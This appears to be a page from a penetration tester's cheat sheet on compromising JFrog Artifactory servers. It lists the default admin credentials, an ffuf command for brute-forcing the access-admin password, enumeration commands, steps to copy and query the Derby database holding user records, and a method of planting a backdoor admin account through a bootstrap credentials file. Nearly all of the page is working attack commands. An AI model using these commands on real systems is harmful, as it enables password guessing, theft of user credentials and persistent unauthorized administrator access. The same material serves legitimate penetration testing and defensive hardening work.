Artifactory

https://keramas.github.io/2020/04/03/jfrog-ssrf-vulnerability.html

Default credentials 👉🏻 admin:password.

Brute Force access-admin

Brute force access-admin's password with ffuf:

$ echo -n access-admin > usernames.txt
$ ./ffuf_basicauth.sh usernames.txt passwords.txt | ffuf -c -u http://192.168.1.11:8081/artifactory/api/v1/system/health -w -:AUTH -H 'Authorization: Basic AUTH' -H 'Content-Type: application/json' -fc 403

Enumeration

Spot running processes:

$ ps aux | grep artifactory

Files location:

$ find /opt/jfrog/artifactory/var/data/artifactory/filestore

Backup location:

$ find /opt/jfrog/artifactory/var/backup/access

Compromise Database

$ mkdir /tmp/dbcopy
$ sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/dbcopy
$ sudo chmod 755 /tmp/dbcopy/derby
$ sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij
ij> connect 'jdbc:derby:/tmp/dbcopy/derby';
ij> select * from access_users;

Add Admin Account

$ sudo bash -c "echo 'snovvcrash*=Passw0rd!' > /opt/jfrog/artifactory/var/etc/access/bootstrap.creds"
$ sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/bootstrap.creds
$ sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop
$ sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start
$ sudo grep "Create admin user" /opt/jfrog/artifactory/var/log/console.log

Last updated 4 years ago

hashtagBrute Force access-admin

hashtagEnumeration

hashtagCompromise Database

hashtagAdd Admin Account

Brute Force access-admin

Enumeration

Compromise Database

Add Admin Account